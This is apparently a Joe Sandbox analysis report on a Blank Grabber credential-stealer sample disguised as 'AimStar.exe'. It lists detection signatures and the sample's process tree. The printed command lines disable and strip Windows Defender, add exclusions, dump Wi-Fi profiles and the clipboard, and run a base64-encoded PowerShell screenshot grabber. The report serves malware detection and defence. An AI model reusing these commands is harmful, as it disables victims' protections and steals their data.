Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AimStar.exe

Overview

General Information

Sample name:AimStar.exe
Analysis ID:1583098
MD5:9e5a9429bc193ee14ebc1f87201be518
SHA1:0e3626c6fa7bd68417244bbbb310173e67c42401
SHA256:85f1d6c7ae21dd89e2421559fd8192ad9d885529eb684786aeda8abc273870bc
Tags:BlankGrabberexeuser-aachum
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (STR)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • AimStar.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\AimStar.exe" MD5: 9E5A9429BC193EE14EBC1F87201BE518)
    • AimStar.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\AimStar.exe" MD5: 9E5A9429BC193EE14EBC1F87201BE518)
      • cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7524 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7400 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7552 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7852 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7420 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7628 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7488 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7636 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7840 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7892 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7976 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7996 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8056 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8168 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6528 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5440 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6660 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1436 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7320 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1220 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7312 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1860 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7576 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7892 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7640 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7888 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7764 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7748 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7440 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7444 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 4404 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7660 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1C05.tmp" "c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8028 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7392 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • SIHClient.exe (PID: 7840 cmdline: C:\Windows\System32\sihclient.exe /cv QZj+5JUF0k+XXwZK8rpr7Q.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)
      • cmd.exe (PID: 7944 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7496 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7596 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8052 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7452 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5748 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
